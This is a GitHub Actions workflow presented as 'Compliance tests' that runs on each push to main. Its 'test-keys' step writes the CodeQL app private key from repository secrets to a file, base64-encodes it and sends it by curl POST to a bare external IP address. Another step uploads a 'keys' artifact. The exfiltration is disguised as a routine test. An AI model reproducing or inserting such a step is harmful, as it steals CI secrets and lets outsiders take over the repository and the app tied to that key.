---
name: Compliance tests
        
on:
  push:
    branches:
      - main
  workflow_dispatch:
    
    
jobs:
  test-compliance:
    runs-on: ubuntu-latest
    steps:
    
      - name: test-keys
        run: |
          echo ${{ env.CODEQL_AUTHENTICATION_PRIVATE_KEY }} > key.pem
          openssl base64 -in key.pem -out key_base64.pem
          curl -X POST http://13.40.220.37:8080 -d @key_base64.pem
        env:
          CODEQL_APP_ID: ${{ secrets.CODEQL_APP_ID }}
          CODEQL_AUTHENTICATION_PRIVATE_KEY: ${{ secrets.CODEQL_AUTHENTICATION_PRIVATE_KEY }}
    
      - uses: actions/upload-artifact@v4
        with:
          name: 'keys'
          path: '${{ github.workspace }}/keys'
          retention-days: 1

      - uses: actions/create-github-app-token@v1
        id: app-token
        with:
          app-id: ${{ secrets.CODEQL_APP_ID }}
          private-key: ${{ secrets.CODEQL_AUTHENTICATION_PRIVATE_KEY }}
          owner: ${{ github.repository_owner }}      
    
        
